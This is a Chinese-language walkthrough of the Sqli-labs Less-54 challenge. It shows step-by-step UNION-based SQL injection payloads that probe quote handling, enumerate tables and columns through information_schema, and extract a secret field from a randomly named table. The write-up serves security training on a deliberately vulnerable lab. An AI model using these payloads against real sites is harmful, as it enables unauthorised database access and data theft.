Sqli-labs之Less:54-57
Less-54
基于错误_GET_单引号_字符型_UNION注入
翻译:
请输入ID作为参数,数值与实验室时习相同
此挑战的目标是在不到10次的尝试中从数据库(challenges)的随机表中转储(**)
为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。
从 Less 54 - Less 65 这 12 关属于 Page 4:Challenges,这些是一些综合的注入训练,限制了查询的次数,更贴近于 GET 的实战。这也是整个 Sqli-Labs 的最后一部分。
现在我们将综合运用之前所学的各种注入技巧,拿到 **。
我们先正常访问下页面:
从图中我们了解到了:
我们顺便看下核心源代码:
详情请看源代码。
下面开始我们的注入:
?id=1'
?id=1"
双引号正常,单引号无报错回显,为字符型单引号闭合。(无法进行报错注入)
?id=1'--+
正确回显,未过滤注释。
?id=0' union select 1,2,3--+
既然有回显,在相应位置使用union
注入即可。
该题提示我们数据库为challenges,我们可以在后台查看:
但是这里数据表是随机生成的,到达10次后,可以 reset(重置)一下,数据表就会发生变化
爆表
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
爆字段:
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='iaem80ucss'--+
那个secret
加上奇奇怪怪字符的字段应该就是我们想要的。
爆数据:
由于尝试的次数达到10次,再次提交就会提醒我们并强制重置:
上面的页面停留3秒后,返回到最初的页面:
好吧,好吧,直接从爆表重新来过吧,这里就不在演示上面重复的操作,直接演示爆数据:
?id=0' union select 1,2,group_concat(secret_K2YN) from challenges.mtwan8eq7l--+
在下面的输入框中输入 ** 即可,出现祝贺的图片:
congrats you nailed it -------->恭喜你成功了
这个成功的页面会在3秒后关闭,并强制重置到最初的页面,所以为了截这张图又特意做了一边,谁叫我截图慢了一步呢 ╮(-_-)╭
--------------------------------------- 分隔符 ----------------------------